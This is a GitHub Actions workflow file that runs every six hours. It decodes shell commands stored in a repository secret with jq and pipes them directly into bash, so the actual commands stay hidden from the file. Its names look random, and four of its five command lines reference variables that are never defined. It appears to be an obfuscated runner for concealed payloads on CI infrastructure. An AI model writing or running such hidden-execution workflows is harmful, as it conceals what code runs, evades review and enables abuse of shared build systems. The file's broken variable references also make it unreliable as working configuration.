name: chenzhishi4567

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenzhishi4567
        env:
          v4: ${{ secrets.v4 }}
        run: |
          echo $v4 | jq -r .iy1422 | /bin/bash
          echo $s426 | jq -r .p6 | /bin/bash
          echo $mqwwc0628 | jq -r .wboix3 | /bin/bash
          echo $ojk830 | jq -r .iqq011 | /bin/bash
          echo $wk33 | jq -r .ckmni15523 | /bin/bash

